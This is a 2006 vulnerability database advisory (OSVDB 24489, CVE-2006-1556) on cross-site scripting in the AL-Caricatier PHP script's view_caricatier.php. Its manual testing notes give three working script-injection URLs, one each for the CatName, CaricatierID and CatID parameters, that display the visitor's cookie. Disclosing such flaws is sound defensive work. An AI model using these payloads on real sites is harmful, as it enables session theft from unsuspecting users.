AL-Caricatier view_caricatier.php Multiple Variable XSS

2006-03-28T03:27:05
ID OSVDB:24489
Type osvdb
Reporter OSVDB
Modified 2006-03-28T03:27:05

Description

Manual Testing Notes

http://[target]/AL-Caricatier/view_caricatier.php?CatName='><script>alert(document.cookie);</script>
http://[target]/AL-Caricatier/view_caricatier.php?CaricatierID='><script>alert(document.cookie);</script>
http://[target]/AL-Caricatier/view_caricatier.php?CatID='><script>alert(document.cookie);</script>

References:

Vendor URL: http://www.php-ar.com/
Secunia Advisory ID: 17292
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-03/0532.html
CVE-2006-1556
Bugtraq ID: 17289